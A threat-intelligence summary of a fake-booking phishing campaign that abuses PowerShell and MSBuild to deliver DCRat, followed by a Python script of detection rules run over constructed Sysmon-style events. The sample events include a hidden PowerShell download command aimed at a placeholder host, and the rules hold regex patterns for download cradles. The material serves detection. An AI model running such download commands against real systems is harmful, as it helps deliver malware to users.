Overview
- Securonix is tracking the late‑December PHALT#BLYX campaign targeting European hospitality staff with euro‑denominated reservation cancellation emails.
- Victims are redirected to a high‑fidelity Booking.com clone that shows a fake CAPTCHA check followed by a full‑screen fake BSOD (blue screen) page instructing them to paste a PowerShell command into the Windows Run dialog.
- The command downloads an MSBuild project file (v.proj) that MSBuild.exe executes to tamper with Microsoft Defender, seek elevation through repeated UAC prompts, and establish Startup folder .url persistence.
- The final payload is a customized DCRat loader that injects into legitimate processes for stealth and enables remote access, keylogging, and delivery of additional malware.
- Researchers note a shift from HTA/mshta delivery to living‑off‑the‑land execution via MSBuild, report Russian‑language artifacts without firm attribution, and share IOCs plus guidance to verify booking emails and monitor MSBuild and PowerShell activity.
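The three stages above (PowerShell pasted into the Run dialog, MSBuild.exe executing a dropped project file, a .url shortcut in the Startup folder) each leave distinct process and file telemetry. The hunt logic below is an added example written for this page, not Securonix's own detection content; it runs over constructed Sysmon-style records (Event ID 1 process creation, Event ID 11 file creation) whose paths, hostnames and command lines are made up, and it encodes two assumptions worth knowing: anything launched from Win+R has explorer.exe as its parent, and MSBuild.exe normally runs from build tooling against source trees, not from PowerShell against a project file in AppData or Temp.

```python
"""Hunt rules for the PHALT#BLYX execution chain over Sysmon-style events.

Added example for this summary, not Securonix's detection content. Field names
follow Sysmon (Image, ParentImage, CommandLine, TargetFilename); all values in
SAMPLE_EVENTS are constructed and are not real indicators.
"""
import re

# Paths an unprivileged user can write to; a project file here is suspect.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|Downloads)\\", re.I)
# Download/eval cradles typically seen in pasted "fix" commands.
DOWNLOAD_CRADLE = re.compile(
    r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\biex\b|"
    r"invoke-expression|\s-enc(?:odedcommand)?\b|start-bitstransfer|\bcurl\b",
    re.I,
)
# First project-file-looking argument on an MSBuild command line.
MSBUILD_PROJECT = re.compile(r'"?([^\s"]+\.(?:proj|csproj|vbproj|xml))"?', re.I)
# Per-user and all-users Startup folders both end in this path fragment.
STARTUP_URL = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.url$", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_clickfix_run(ev: dict) -> bool:
    """Stage 1: PowerShell under explorer.exe (the parent of anything typed
    into Win+R) whose command line carries a download or eval cradle."""
    return (ev.get("EventID") == 1
            and _name(ev.get("ParentImage", "")) == "explorer.exe"
            and _name(ev.get("Image", "")) in {"powershell.exe", "pwsh.exe"}
            and bool(DOWNLOAD_CRADLE.search(ev.get("CommandLine", ""))))


def rule_msbuild_lolbin(ev: dict) -> bool:
    """Stage 2: MSBuild.exe building a project from a user-writable path,
    or spawned by a script host instead of an IDE or build agent."""
    if ev.get("EventID") != 1 or _name(ev.get("Image", "")) != "msbuild.exe":
        return False
    m = MSBUILD_PROJECT.search(ev.get("CommandLine", ""))
    if not m:
        return False
    suspicious_path = bool(USER_WRITABLE.search(m.group(1)))
    suspicious_parent = _name(ev.get("ParentImage", "")) in SCRIPT_HOSTS
    return suspicious_path or suspicious_parent


def rule_startup_url(ev: dict) -> bool:
    """Stage 3: a .url shortcut written into a Startup folder."""
    return (ev.get("EventID") == 11
            and bool(STARTUP_URL.search(ev.get("TargetFilename", ""))))


RULES = {
    "clickfix_run_dialog": rule_clickfix_run,
    "msbuild_user_writable_project": rule_msbuild_lolbin,
    "startup_url_persistence": rule_startup_url,
}


def triage(events):
    """Return [(rule_name, event), ...] for every event that trips a rule."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: the first three records mimic the chain,
# the last two are benign look-alikes the rules must not flag.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/v.proj -OutFile $env:TEMP\v.proj"'},
    {"EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\v.proj"},
    {"EventID": 11,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
    {"EventID": 1,  # developer build launched from Visual Studio on a source tree
     "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"EventID": 1,  # user opened an interactive shell from Win+R, no cradle
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
]

if __name__ == "__main__":
    for name, ev in triage(SAMPLE_EVENTS):
        print(f"[{name}] {ev.get('CommandLine') or ev.get('TargetFilename')}")
```

Each rule is deliberately narrow on its own; what makes this chain stand out is the three firing on the same host in sequence, so correlate hits by host and time window rather than alerting on any single one. Expect to tune the user-writable path list and the MSBuild parent allow-list to your environment, since build agents and developer workstations legitimately invoke MSBuild from cmd.exe and PowerShell.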